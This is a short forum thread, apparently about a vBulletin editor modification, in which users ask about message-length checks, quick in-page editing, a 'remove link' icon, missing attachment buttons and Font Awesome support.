Tell me, please, where is this option?

If I turn off mod and write a short message, the script automatically sends the page with advanced message mode and wrote on it "Type your message is too short. Increase your message up to 10 characters long.".

And if I turn on mod, it does not write anything and do not get advanced message mode, when i wrote short message.

ChiNa
07-19-2012, 11:21 PM
This is a good one, but where can I get one like vBulletin.org, when you edit your post, it doest it very quick and in same page... Any mods for this?

Simon Lloyd
07-20-2012, 02:30 PM
You need to make sure that you have all ajax features turned on in admincp

Mohsen71
05-25-2013, 01:12 PM
how can i add "remove link" icon in it?

blaize
11-20-2013, 08:34 PM
Hmm my attachment options don't work any more for some reason. They were visible and worked yesterday but have now disappeared. The attachment icon/button does not show and neither does the upload box. Anyone have any ideas about what I need to check or redo.

m7sen
09-06-2018, 08:22 AM
Hi,

is there a way to support Font Awesome ?
https://vborg.vbsupport.ru/showthread.php?t=324161